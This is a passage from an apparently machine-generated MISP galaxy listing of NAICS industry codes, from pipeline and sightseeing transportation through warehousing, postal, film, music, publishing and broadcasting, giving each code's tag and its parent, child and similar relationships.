  • similar: misp-galaxy:naics="486990" with estimative-language:likelihood-probability="likely"

486990

All Other Pipeline Transportation

The tag is: misp-galaxy:naics="486990"

486990 has relationships with:

  • child-of: misp-galaxy:naics="4869" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48699" with estimative-language:likelihood-probability="likely"

487

Scenic and Sightseeing Transportation

The tag is: misp-galaxy:naics="487"

487 has relationships with:

  • parent-of: misp-galaxy:naics="4871" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4872" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4879" with estimative-language:likelihood-probability="likely"

4871

Scenic and Sightseeing Transportation, Land

The tag is: misp-galaxy:naics="4871"

4871 has relationships with:

  • child-of: misp-galaxy:naics="487" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48711" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="487110" with estimative-language:likelihood-probability="likely"

48711

Scenic and Sightseeing Transportation, Land

The tag is: misp-galaxy:naics="48711"

48711 has relationships with:

  • child-of: misp-galaxy:naics="4871" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="487110" with estimative-language:likelihood-probability="likely"

487110

Scenic and Sightseeing Transportation, Land

The tag is: misp-galaxy:naics="487110"

487110 has relationships with:

  • child-of: misp-galaxy:naics="4871" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48711" with estimative-language:likelihood-probability="likely"

4872

Scenic and Sightseeing Transportation, Water

The tag is: misp-galaxy:naics="4872"

4872 has relationships with:

  • child-of: misp-galaxy:naics="487" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48721" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="487210" with estimative-language:likelihood-probability="likely"

48721

Scenic and Sightseeing Transportation, Water

The tag is: misp-galaxy:naics="48721"

48721 has relationships with:

  • child-of: misp-galaxy:naics="4872" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="487210" with estimative-language:likelihood-probability="likely"

487210

Scenic and Sightseeing Transportation, Water

The tag is: misp-galaxy:naics="487210"

487210 has relationships with:

  • child-of: misp-galaxy:naics="4872" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48721" with estimative-language:likelihood-probability="likely"

4879

Scenic and Sightseeing Transportation, Other

The tag is: misp-galaxy:naics="4879"

4879 has relationships with:

  • child-of: misp-galaxy:naics="487" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48799" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="487990" with estimative-language:likelihood-probability="likely"

48799

Scenic and Sightseeing Transportation, Other

The tag is: misp-galaxy:naics="48799"

48799 has relationships with:

  • child-of: misp-galaxy:naics="4879" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="487990" with estimative-language:likelihood-probability="likely"

487990

Scenic and Sightseeing Transportation, Other

The tag is: misp-galaxy:naics="487990"

487990 has relationships with:

  • child-of: misp-galaxy:naics="4879" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48799" with estimative-language:likelihood-probability="likely"

488

Support Activities for Transportation

The tag is: misp-galaxy:naics="488"

488 has relationships with:

  • parent-of: misp-galaxy:naics="4881" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4882" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4883" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4884" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4885" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4889" with estimative-language:likelihood-probability="likely"

4881

Support Activities for Air Transportation

The tag is: misp-galaxy:naics="4881"

4881 has relationships with:

  • child-of: misp-galaxy:naics="488" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48811" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="488111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="488119" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48819" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="488190" with estimative-language:likelihood-probability="likely"

48811

Airport Operations

The tag is: misp-galaxy:naics="48811"

48811 has relationships with:

  • child-of: misp-galaxy:naics="4881" with estimative-language:likelihood-probability="likely"

488111

Air Traffic Control

The tag is: misp-galaxy:naics="488111"

488111 has relationships with:

  • child-of: misp-galaxy:naics="4881" with estimative-language:likelihood-probability="likely"

488119

Other Airport Operations

The tag is: misp-galaxy:naics="488119"

488119 has relationships with:

  • child-of: misp-galaxy:naics="4881" with estimative-language:likelihood-probability="likely"

48819

Other Support Activities for Air Transportation

The tag is: misp-galaxy:naics="48819"

48819 has relationships with:

  • child-of: misp-galaxy:naics="4881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="488190" with estimative-language:likelihood-probability="likely"

488190

Other Support Activities for Air Transportation

The tag is: misp-galaxy:naics="488190"

488190 has relationships with:

  • child-of: misp-galaxy:naics="4881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48819" with estimative-language:likelihood-probability="likely"

4882

Support Activities for Rail Transportation

The tag is: misp-galaxy:naics="4882"

4882 has relationships with:

  • child-of: misp-galaxy:naics="488" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48821" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="488210" with estimative-language:likelihood-probability="likely"

48821

Support Activities for Rail Transportation

The tag is: misp-galaxy:naics="48821"

48821 has relationships with:

  • child-of: misp-galaxy:naics="4882" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="488210" with estimative-language:likelihood-probability="likely"

488210

Support Activities for Rail Transportation

The tag is: misp-galaxy:naics="488210"

488210 has relationships with:

  • child-of: misp-galaxy:naics="4882" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48821" with estimative-language:likelihood-probability="likely"

4883

Support Activities for Water Transportation

The tag is: misp-galaxy:naics="4883"

4883 has relationships with:

  • child-of: misp-galaxy:naics="488" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48831" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="488310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48832" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="488320" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48833" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="488330" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48839" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="488390" with estimative-language:likelihood-probability="likely"

48831

Port and Harbor Operations

The tag is: misp-galaxy:naics="48831"

48831 has relationships with:

  • child-of: misp-galaxy:naics="4883" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="488310" with estimative-language:likelihood-probability="likely"

488310

Port and Harbor Operations

The tag is: misp-galaxy:naics="488310"

488310 has relationships with:

  • child-of: misp-galaxy:naics="4883" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48831" with estimative-language:likelihood-probability="likely"

48832

Marine Cargo Handling

The tag is: misp-galaxy:naics="48832"

48832 has relationships with:

  • child-of: misp-galaxy:naics="4883" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="488320" with estimative-language:likelihood-probability="likely"

488320

Marine Cargo Handling

The tag is: misp-galaxy:naics="488320"

488320 has relationships with:

  • child-of: misp-galaxy:naics="4883" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48832" with estimative-language:likelihood-probability="likely"

48833

Navigational Services to Shipping

The tag is: misp-galaxy:naics="48833"

48833 has relationships with:

  • child-of: misp-galaxy:naics="4883" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="488330" with estimative-language:likelihood-probability="likely"

488330

Navigational Services to Shipping

The tag is: misp-galaxy:naics="488330"

488330 has relationships with:

  • child-of: misp-galaxy:naics="4883" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48833" with estimative-language:likelihood-probability="likely"

48839

Other Support Activities for Water Transportation

The tag is: misp-galaxy:naics="48839"

48839 has relationships with:

  • child-of: misp-galaxy:naics="4883" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="488390" with estimative-language:likelihood-probability="likely"

488390

Other Support Activities for Water Transportation

The tag is: misp-galaxy:naics="488390"

488390 has relationships with:

  • child-of: misp-galaxy:naics="4883" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48839" with estimative-language:likelihood-probability="likely"

4884

Support Activities for Road Transportation

The tag is: misp-galaxy:naics="4884"

4884 has relationships with:

  • child-of: misp-galaxy:naics="488" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48841" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="488410" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48849" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="488490" with estimative-language:likelihood-probability="likely"

48841

Motor Vehicle Towing

The tag is: misp-galaxy:naics="48841"

48841 has relationships with:

  • child-of: misp-galaxy:naics="4884" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="488410" with estimative-language:likelihood-probability="likely"

488410

Motor Vehicle Towing

The tag is: misp-galaxy:naics="488410"

488410 has relationships with:

  • child-of: misp-galaxy:naics="4884" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48841" with estimative-language:likelihood-probability="likely"

48849

Other Support Activities for Road Transportation

The tag is: misp-galaxy:naics="48849"

48849 has relationships with:

  • child-of: misp-galaxy:naics="4884" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="488490" with estimative-language:likelihood-probability="likely"

488490

Other Support Activities for Road Transportation

The tag is: misp-galaxy:naics="488490"

488490 has relationships with:

  • child-of: misp-galaxy:naics="4884" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48849" with estimative-language:likelihood-probability="likely"

4885

Freight Transportation Arrangement

The tag is: misp-galaxy:naics="4885"

4885 has relationships with:

  • child-of: misp-galaxy:naics="488" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48851" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="488510" with estimative-language:likelihood-probability="likely"

48851

Freight Transportation Arrangement

The tag is: misp-galaxy:naics="48851"

48851 has relationships with:

  • child-of: misp-galaxy:naics="4885" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="488510" with estimative-language:likelihood-probability="likely"

488510

Freight Transportation Arrangement

The tag is: misp-galaxy:naics="488510"

488510 has relationships with:

  • child-of: misp-galaxy:naics="4885" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48851" with estimative-language:likelihood-probability="likely"

4889

Other Support Activities for Transportation

The tag is: misp-galaxy:naics="4889"

4889 has relationships with:

  • child-of: misp-galaxy:naics="488" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48899" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="488991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="488999" with estimative-language:likelihood-probability="likely"

48899

Other Support Activities for Transportation

The tag is: misp-galaxy:naics="48899"

48899 has relationships with:

  • child-of: misp-galaxy:naics="4889" with estimative-language:likelihood-probability="likely"

488991

Packing and Crating

The tag is: misp-galaxy:naics="488991"

488991 has relationships with:

  • child-of: misp-galaxy:naics="4889" with estimative-language:likelihood-probability="likely"

488999

All Other Support Activities for Transportation

The tag is: misp-galaxy:naics="488999"

488999 has relationships with:

  • child-of: misp-galaxy:naics="4889" with estimative-language:likelihood-probability="likely"

491

Postal Service

The tag is: misp-galaxy:naics="491"

491 has relationships with:

  • parent-of: misp-galaxy:naics="4911" with estimative-language:likelihood-probability="likely"

4911

Postal Service

The tag is: misp-galaxy:naics="4911"

4911 has relationships with:

  • child-of: misp-galaxy:naics="491" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="49111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="491110" with estimative-language:likelihood-probability="likely"

49111

Postal Service

The tag is: misp-galaxy:naics="49111"

49111 has relationships with:

  • child-of: misp-galaxy:naics="4911" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="491110" with estimative-language:likelihood-probability="likely"

491110

Postal Service

The tag is: misp-galaxy:naics="491110"

491110 has relationships with:

  • child-of: misp-galaxy:naics="4911" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="49111" with estimative-language:likelihood-probability="likely"

492

Couriers and Messengers

The tag is: misp-galaxy:naics="492"

492 has relationships with:

  • parent-of: misp-galaxy:naics="4921" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4922" with estimative-language:likelihood-probability="likely"

4921

Couriers and Express Delivery Services

The tag is: misp-galaxy:naics="4921"

4921 has relationships with:

  • child-of: misp-galaxy:naics="492" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="49211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="492110" with estimative-language:likelihood-probability="likely"

49211

Couriers and Express Delivery Services

The tag is: misp-galaxy:naics="49211"

49211 has relationships with:

  • child-of: misp-galaxy:naics="4921" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="492110" with estimative-language:likelihood-probability="likely"

492110

Couriers and Express Delivery Services

The tag is: misp-galaxy:naics="492110"

492110 has relationships with:

  • child-of: misp-galaxy:naics="4921" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="49211" with estimative-language:likelihood-probability="likely"

4922

Local Messengers and Local Delivery

The tag is: misp-galaxy:naics="4922"

4922 has relationships with:

  • child-of: misp-galaxy:naics="492" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="49221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="492210" with estimative-language:likelihood-probability="likely"

49221

Local Messengers and Local Delivery

The tag is: misp-galaxy:naics="49221"

49221 has relationships with:

  • child-of: misp-galaxy:naics="4922" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="492210" with estimative-language:likelihood-probability="likely"

492210

Local Messengers and Local Delivery

The tag is: misp-galaxy:naics="492210"

492210 has relationships with:

  • child-of: misp-galaxy:naics="4922" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="49221" with estimative-language:likelihood-probability="likely"

493

Warehousing and Storage

The tag is: misp-galaxy:naics="493"

493 has relationships with:

  • parent-of: misp-galaxy:naics="4931" with estimative-language:likelihood-probability="likely"

4931

Warehousing and Storage

The tag is: misp-galaxy:naics="4931"

4931 has relationships with:

  • child-of: misp-galaxy:naics="493" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="49311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="493110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="49312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="493120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="49313" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="493130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="49319" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="493190" with estimative-language:likelihood-probability="likely"

49311

General Warehousing and Storage

The tag is: misp-galaxy:naics="49311"

49311 has relationships with:

  • child-of: misp-galaxy:naics="4931" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="493110" with estimative-language:likelihood-probability="likely"

493110

General Warehousing and Storage

The tag is: misp-galaxy:naics="493110"

493110 has relationships with:

  • child-of: misp-galaxy:naics="4931" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="49311" with estimative-language:likelihood-probability="likely"

49312

Refrigerated Warehousing and Storage

The tag is: misp-galaxy:naics="49312"

49312 has relationships with:

  • child-of: misp-galaxy:naics="4931" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="493120" with estimative-language:likelihood-probability="likely"

493120

Refrigerated Warehousing and Storage

The tag is: misp-galaxy:naics="493120"

493120 has relationships with:

  • child-of: misp-galaxy:naics="4931" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="49312" with estimative-language:likelihood-probability="likely"

49313

Farm Product Warehousing and Storage

The tag is: misp-galaxy:naics="49313"

49313 has relationships with:

  • child-of: misp-galaxy:naics="4931" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="493130" with estimative-language:likelihood-probability="likely"

493130

Farm Product Warehousing and Storage

The tag is: misp-galaxy:naics="493130"

493130 has relationships with:

  • child-of: misp-galaxy:naics="4931" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="49313" with estimative-language:likelihood-probability="likely"

49319

Other Warehousing and Storage

The tag is: misp-galaxy:naics="49319"

49319 has relationships with:

  • child-of: misp-galaxy:naics="4931" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="493190" with estimative-language:likelihood-probability="likely"

493190

Other Warehousing and Storage

The tag is: misp-galaxy:naics="493190"

493190 has relationships with:

  • child-of: misp-galaxy:naics="4931" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="49319" with estimative-language:likelihood-probability="likely"

51

Information

The tag is: misp-galaxy:naics="51"

51 has relationships with:

  • parent-of: misp-galaxy:naics="512" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="513" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="516" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="517" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="518" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="519" with estimative-language:likelihood-probability="likely"

512

Motion Picture and Sound Recording Industries

The tag is: misp-galaxy:naics="512"

512 has relationships with:

  • child-of: misp-galaxy:naics="51" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5122" with estimative-language:likelihood-probability="likely"

5121

Motion Picture and Video Industries

The tag is: misp-galaxy:naics="5121"

5121 has relationships with:

  • child-of: misp-galaxy:naics="512" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="512110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="512120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51213" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="512131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="512132" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51219" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="512191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="512199" with estimative-language:likelihood-probability="likely"

51211

Motion Picture and Video Production

The tag is: misp-galaxy:naics="51211"

51211 has relationships with:

  • child-of: misp-galaxy:naics="5121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="512110" with estimative-language:likelihood-probability="likely"

512110

Motion Picture and Video Production

The tag is: misp-galaxy:naics="512110"

512110 has relationships with:

  • child-of: misp-galaxy:naics="5121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51211" with estimative-language:likelihood-probability="likely"

51212

Motion Picture and Video Distribution

The tag is: misp-galaxy:naics="51212"

51212 has relationships with:

  • child-of: misp-galaxy:naics="5121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="512120" with estimative-language:likelihood-probability="likely"

512120

Motion Picture and Video Distribution

The tag is: misp-galaxy:naics="512120"

512120 has relationships with:

  • child-of: misp-galaxy:naics="5121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51212" with estimative-language:likelihood-probability="likely"

51213

Motion Picture and Video Exhibition

The tag is: misp-galaxy:naics="51213"

51213 has relationships with:

  • child-of: misp-galaxy:naics="5121" with estimative-language:likelihood-probability="likely"

512131

Motion Picture Theaters (except Drive-Ins)

The tag is: misp-galaxy:naics="512131"

512131 has relationships with:

  • child-of: misp-galaxy:naics="5121" with estimative-language:likelihood-probability="likely"

512132

Drive-In Motion Picture Theaters

The tag is: misp-galaxy:naics="512132"

512132 has relationships with:

  • child-of: misp-galaxy:naics="5121" with estimative-language:likelihood-probability="likely"

51219

Postproduction Services and Other Motion Picture and Video Industries

The tag is: misp-galaxy:naics="51219"

51219 has relationships with:

  • child-of: misp-galaxy:naics="5121" with estimative-language:likelihood-probability="likely"

512191

Teleproduction and Other Postproduction Services

The tag is: misp-galaxy:naics="512191"

512191 has relationships with:

  • child-of: misp-galaxy:naics="5121" with estimative-language:likelihood-probability="likely"

512199

Other Motion Picture and Video Industries

The tag is: misp-galaxy:naics="512199"

512199 has relationships with:

  • child-of: misp-galaxy:naics="5121" with estimative-language:likelihood-probability="likely"

5122

Sound Recording Industries

The tag is: misp-galaxy:naics="5122"

5122 has relationships with:

  • child-of: misp-galaxy:naics="512" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51223" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="512230" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51224" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="512240" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51225" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="512250" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51229" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="512290" with estimative-language:likelihood-probability="likely"

51223

Music Publishers

The tag is: misp-galaxy:naics="51223"

51223 has relationships with:

  • child-of: misp-galaxy:naics="5122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="512230" with estimative-language:likelihood-probability="likely"

512230

Music Publishers

The tag is: misp-galaxy:naics="512230"

512230 has relationships with:

  • child-of: misp-galaxy:naics="5122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51223" with estimative-language:likelihood-probability="likely"

51224

Sound Recording Studios

The tag is: misp-galaxy:naics="51224"

51224 has relationships with:

  • child-of: misp-galaxy:naics="5122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="512240" with estimative-language:likelihood-probability="likely"

512240

Sound Recording Studios

The tag is: misp-galaxy:naics="512240"

512240 has relationships with:

  • child-of: misp-galaxy:naics="5122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51224" with estimative-language:likelihood-probability="likely"

51225

Record Production and Distribution

The tag is: misp-galaxy:naics="51225"

51225 has relationships with:

  • child-of: misp-galaxy:naics="5122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="512250" with estimative-language:likelihood-probability="likely"

512250

Record Production and Distribution

The tag is: misp-galaxy:naics="512250"

512250 has relationships with:

  • child-of: misp-galaxy:naics="5122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51225" with estimative-language:likelihood-probability="likely"

51229

Other Sound Recording Industries

The tag is: misp-galaxy:naics="51229"

51229 has relationships with:

  • child-of: misp-galaxy:naics="5122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="512290" with estimative-language:likelihood-probability="likely"

512290

Other Sound Recording Industries

The tag is: misp-galaxy:naics="512290"

512290 has relationships with:

  • child-of: misp-galaxy:naics="5122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51229" with estimative-language:likelihood-probability="likely"

513

Publishing Industries

The tag is: misp-galaxy:naics="513"

513 has relationships with:

  • child-of: misp-galaxy:naics="51" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5132" with estimative-language:likelihood-probability="likely"

5131

Newspaper, Periodical, Book, and Directory Publishers

The tag is: misp-galaxy:naics="5131"

5131 has relationships with:

  • child-of: misp-galaxy:naics="513" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="513110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="513120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51313" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="513130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51314" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="513140" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51319" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="513191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="513199" with estimative-language:likelihood-probability="likely"

51311

Newspaper Publishers

The tag is: misp-galaxy:naics="51311"

51311 has relationships with:

  • child-of: misp-galaxy:naics="5131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="513110" with estimative-language:likelihood-probability="likely"

513110

Newspaper Publishers

The tag is: misp-galaxy:naics="513110"

513110 has relationships with:

  • child-of: misp-galaxy:naics="5131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51311" with estimative-language:likelihood-probability="likely"

51312

Periodical Publishers

The tag is: misp-galaxy:naics="51312"

51312 has relationships with:

  • child-of: misp-galaxy:naics="5131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="513120" with estimative-language:likelihood-probability="likely"

513120

Periodical Publishers

The tag is: misp-galaxy:naics="513120"

513120 has relationships with:

  • child-of: misp-galaxy:naics="5131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51312" with estimative-language:likelihood-probability="likely"

51313

Book Publishers

The tag is: misp-galaxy:naics="51313"

51313 has relationships with:

  • child-of: misp-galaxy:naics="5131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="513130" with estimative-language:likelihood-probability="likely"

513130

Book Publishers

The tag is: misp-galaxy:naics="513130"

513130 has relationships with:

  • child-of: misp-galaxy:naics="5131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51313" with estimative-language:likelihood-probability="likely"

51314

Directory and Mailing List Publishers

The tag is: misp-galaxy:naics="51314"

51314 has relationships with:

  • child-of: misp-galaxy:naics="5131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="513140" with estimative-language:likelihood-probability="likely"

513140

Directory and Mailing List Publishers

The tag is: misp-galaxy:naics="513140"

513140 has relationships with:

  • child-of: misp-galaxy:naics="5131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51314" with estimative-language:likelihood-probability="likely"

51319

Other Publishers

The tag is: misp-galaxy:naics="51319"

51319 has relationships with:

  • child-of: misp-galaxy:naics="5131" with estimative-language:likelihood-probability="likely"

513191

Greeting Card Publishers

The tag is: misp-galaxy:naics="513191"

513191 has relationships with:

  • child-of: misp-galaxy:naics="5131" with estimative-language:likelihood-probability="likely"

513199

All Other Publishers

The tag is: misp-galaxy:naics="513199"

513199 has relationships with:

  • child-of: misp-galaxy:naics="5131" with estimative-language:likelihood-probability="likely"

5132

Software Publishers

The tag is: misp-galaxy:naics="5132"

5132 has relationships with:

  • child-of: misp-galaxy:naics="513" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="513210" with estimative-language:likelihood-probability="likely"

51321

Software Publishers

The tag is: misp-galaxy:naics="51321"

51321 has relationships with:

  • child-of: misp-galaxy:naics="5132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="513210" with estimative-language:likelihood-probability="likely"

513210

Software Publishers

The tag is: misp-galaxy:naics="513210"

513210 has relationships with:

  • child-of: misp-galaxy:naics="5132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51321" with estimative-language:likelihood-probability="likely"

516

Broadcasting and Content Providers

The tag is: misp-galaxy:naics="516"

516 has relationships with:

  • child-of: misp-galaxy:naics="51" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5161" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5162" with estimative-language:likelihood-probability="likely"

5161

Radio and Television Broadcasting Stations

The tag is: misp-galaxy:naics="5161"

5161 has relationships with:

  • child-of: misp-galaxy:naics="516" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="516110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51612" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="516120" with estimative-language:likelihood-probability="likely"

51611

Radio Broadcasting Stations

The tag is: misp-galaxy:naics="51611"

51611 has relationships with:

